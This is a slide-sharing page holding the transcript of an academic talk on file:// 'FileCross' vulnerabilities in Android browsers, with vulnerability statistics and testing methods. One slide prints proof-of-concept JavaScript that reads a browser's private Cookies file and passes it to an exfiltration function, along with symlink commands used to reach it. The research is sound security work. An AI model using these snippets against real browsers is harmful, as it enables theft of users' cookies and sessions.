Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security.

Slides:

Advertisements

Similar presentations

Nick Feamster CS 6262 Spring 2009

Advertisements

The Internet and the Web

Web Programming 1 Darby Chang Web Programming. Cookie 2 Web Programming.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

HCE AND BLE UNIVERSITY TOMORROWS TRANSACTIONS LONDON, 20 TH MARCH 2014.

On the Privacy of Private Browsing Kiavash Satvat, Matt Forshaw, Feng Hao, Ehsan Toreini Newcastle University DPM’13.

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

An Evaluation of the Google Chrome Extension Security Architecture

Lesson 4: Web Browsing.

Extrusion Testing …testing your controls “inside-out” against the threats that actually matter! Panos Dimitriou, MSc InfoSec, CISSP,CISM Director, Managed.

Indirect File Leaks in Mobile Applications Daoyuan Wu and Rocky K. C. Chang The Hong Kong Polytechnic University May 21, MoST’15, in conjunction.

Web Security Model CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

What is adaptive web technology?  There is an increasingly large demand for software systems which are able to operate effectively in dynamic environments.

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Presented by…. Group 2 1. Programming language 2Introduction.

Computer Concepts 2014 Chapter 7 The Web and .

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Copyright © cs-tutorial.com. Introduction to Web Development In 1990 and 1991,Tim Berners-Lee created the World Wide Web at the European Laboratory for.

Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.

AJAX Without the “J” George Lawniczak. What is Ajax?

C Copyright © 2009, Oracle. All rights reserved. Appendix C: Service-Oriented Architectures.

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

JavaScript, Fourth Edition Chapter 12 Updating Web Pages with AJAX.

AJAX and Java ISYS 350. AJAX Asynchronous JavaScript and XML: – Related technologies: JavaScript, Document Object Model, XML, server-side script such.

Penetration Testing James Walden Northern Kentucky University.

Ku-Yaw Chang Assistant Professor, Department of Computer Science and Information Engineering Da-Yeh University.

1 Thomas Lippert Senior Product Manager - Mobile What’s new in SMC 5.0.

BetterAuth: Web Authentication Revisited Martin Johns, Sebastian Lekies, Bastian Braun, Benjamin Flesch In ACSAC /01/08 A.C. ADL.

October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Lecture 9: AJAX, Javascript review..  AJAX  Synchronous vs. asynchronous browsing.  Refreshing only “part of a page” from a URL.  Frameworks: Prototype,

1 Robust Defenses for Cross-Site Request Forgery Adam Barth, Collin Jackson, John C. Mitchell Stanford University 15th ACM CCS.

Principles of Information Systems, Sixth Edition 1 The Internet, Intranets, and Extranets Chapter 7.

1 3 Computing System Fundamentals 3.4 Networked Computer Systems.

Convenience product security Collin Busch. What is a convenience product? A convenience product is a device or application that makes your life easier.

Android System Security Xinming Ou. Android System Basics An open-source operating system for mobile devices (AOSP, led by Google) – Consists of a base.

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

1 Isolating Web Programs in Modern Browser Architectures CS6204: Cloud Environment Spring 2011.

Engineering Secure Software. Key Principles  Principle of Least privilege  Defense in Depth  Obviously No Vulnerabilities (vs. No Obvious)  i.e. Assume.

SE-2840 Dr. Mark L. Hornick 1 Introduction to Ajax Asynchronous Javascript And XML.

ACM Conference on Computer and Communications Security 2006 Puppetnet: Misusing web browsers as a distributed attack infrastructure Network Seminar Presenter:

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

 AJAX technology  Rich User Experience  Characteristics  Real live examples  JavaScript and AJAX  Web application workflow model – synchronous vs.

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis Conference : ACM.

Web Login, Cookies Web Login | Old way HTML

JavaScript, Sixth Edition Chapter 11 Updating Web Pages with Ajax.

JavaScript and Ajax Week 10 Web site:

Browser code isolation John Mitchell CS 155 Spring 2016.

URLs & Web Protocols 18 URLs & Web Protocols 18. URLs & Web Protocols 18 A URL is a web address Uniform Resource Locator You say it like ‘earl’ A resource.

By: Chuqing He. Android Overview - Purchased by Google in First Android Phone was sold in Oct Linux-based - Holds 75% of the worldwide.

Heat-seeking Honeypots: Design and Experience John P. John, Fang Yu, Yinglian Xie, Arvind Krishnamurthy and Martin Abadi WWW 2011 Presented by Elias P.

Web Page Design The Basics. The Web Page A document (file) created using the HTML scripting language. A document (file) created using the HTML scripting.

IT Security Awareness Day October 19, 2016

Computer & Network Security

What Mobile Ads know about mobile users

JavaScript and Ajax (Ajax Tutorial)

TOPIC: Web Security (Part-4)

What is the Internet? © EIT, Author Gay Robertson, 2016.

Lesson 4: Web Browsing.

Warm Handshake with Websites, Servers and Web Servers:

CSC 495/583 Topics of Software Security Web Browser Security (2)

What is the World Wide Web (www)

ISC440: Web Programming 2 AJAX

JavaScript & jQuery AJAX.

Lesson 4: Web Browsing.

Exploring DOM-Based Cross Site Attacks

Cross Site Request Forgery (CSRF)

Presentation transcript:

Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University Information Security Conference (ISC) 1

file:// It is a standard URI scheme used in modern browsers. – Like the well-known and It can be used to browse local files. 2

Unfortunately, file:// is an enemy of the mobile security model 3

Mobile Security Model: Sandbox-based App Isolation 4 App AApp B app boundary Sensitive files

However, file:// requests may break the app data isolation 5 App AApp B app boundary Sensitive files file:// stolen files file:// vulnerabilities

An Empirical Study on file:// Vulnerabilities in Android Browser Apps 6 A unified attack model, FileCross Automated testing of Android Browsers Vulnerability results: 64 vulnerable browsers 177 FileCross issues Across different system versions and web engines Further analysis: analyze 10 patches and current file:// practices

The FileCross attacks 7 Auto-downloaded to the SD card. Victim Browser Sensitive files Sensitive files Private File Zone Exposed Browsing Interface file:///data/data/pkg/dir/Cookiesfile:///path/attack2.html file:///path/attack4.html file:///path/attack3.html Attack App attack4.html <html><body><h1>attack2</h1><script> var aim = '/data/data/pkg/dir/Cookies'; function sendFile(txt) { … } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> <html><body><h1>attack4</h1><script> var aim = document.URL; function sendFile(txt) { … } setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.onload = function() { sendFile(xhr. responseText); }; xhr.open('GET', aim); xhr.send(null); }, 8000); <script></body></html> The External file:// Browsing Requests <html><body><h1>attack3</h1><script> var aim = ' function sendFile(txt) { … } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> (A4) (A2) (A3) (A1) attack3.html attack2.html Thread.sleep(4000); rm /path/attack4.html ln –s /.../Cookies /path/attack4.html Cmd 4 Cmd 1 Execute Cmd 4 Execute Cmd 1 Thread.sleep(3000); filepath = findFileInSDcard("Cookies"); if (filepath) readFileFromSDcard(filepath); attack2.html Cookies Compromise SOP on the “host” level attack3.html http(s):// content Compromise SOP on the “protocol” level attack4.html docume nt.URL Cookies Compromise SOP via symbolic links

Automated Testing of Android Browsers Test over 100 Android browsers in less than four hours (in multiple devices concurrently) 8

The Architecture and Workflow of Our Testing System 9

The Major Testing Steps Identifying Exposed Browsing Interfaces (EBI) Propose a lightweight but effective scoring mechanism – Score each component based on our summarized EBI patterns – Select the component with a maximal score as the EBI 10 Can accurately identify the EBIs in 113 browsers out of the tested 116 browsers. * The remaining three are: one is add-on, and the other two do not expose browsing interfaces.

The Major Testing Steps Warming up browsers and finding target sensitive files The goal of warming up browsers is to produce some private files. Then our system continues to find target sensitive files from the newly generated private files. 11 “cookie", “password", “bookmark"

The Major Testing Steps Automatic attack validation and characterization We cannot rely on naked- eye inspection. Embed five patterns into the attack requests. Web Receiver automatically interprets them ?pkg= app pkg name &atk= attack ID &ver= device version &con= contents &kid= a key ID

Our Findings 1) Vulnerability results 2) Vulnerability distribution 3) Further analysis 13

Overall Vulnerability Results 14  More than half of the browsers tested are vulnerable to the FileCross attacks. (64 vulnerable browsers)  50% of the most popular browsers are also vulnerable (such as Firefox, Baidu, and Maxthon).

Representative Vulnerable Browsers 15

 The file:// vulnerabilities are exploitable in all Android versions.  A2 and A3 most affect Android 4.0.  But Android 4.3 still has over 30 issues of A2 and A3.  Android 4.4 which employs Chrome- based web engine is still exploitable by A2, A3, A4.  A4 has no engine-level patch in 4.4. Vulnerability Distribution: Across Different System Versions 16

Vulnerability Distribution: Across Different Web Engines Among 15 browsers that employ custom engines, three are vulnerable. Firefox: libmozglue.so UC Browser HD: libWebCore_UC.so Sogou: libsogouwebcore.so 17 This demonstrates our automated system is valuable to test browsers which may adopt different engines.

Patch Analysis We have devoted considerable efforts on reporting our identified vulnerabilities. 18

The Current Practice on Exposed Browsing Interfaces 19 A breakdown of exposed browsing interfaces in the 115 tested browsers

The Current Practice on file:// Support in Android Browsers 20 65% of the browsers accept external file:// browsing requests. 62% even allow file:// access to the private file zones. – We believe this practice should be forbidden in the mobile environment. 63% support JavaScript execution in file:// URLs.

Some Good Practice Examples on file:// Support in Android Browsers 21  file:// is generally not supported in lightweight and dedicated browsers (which spares them from the FileCross attacks).  Several popular browsers already forbid file:// access to private file zones. (Chrome, Dolphin, UC, Yandex browsers)  Three browsers have actively disabled the JavaScript execution in file:// URLS.

Q & A My homepage: 22

Exposed Browsing Interfaces (EBI) Patterns 23

Four Types of FileCross Attacks Attack ID Major flaws Sources A1 Auto-download file to SD card [2] A2 SOP bypass for two file:// origins setAllowFileAccessFr omFileURLs A3 SOP bypass for file:// and http(s):// origins setAllowUniversalAc cessFromFileURLs A4 SOP bypass in handling symbolic links [3,4] 24 We are the first to identify them as a unified attack model (i.e., FileCross) and conduct automated testing to analyze their prevalence in Android browsers.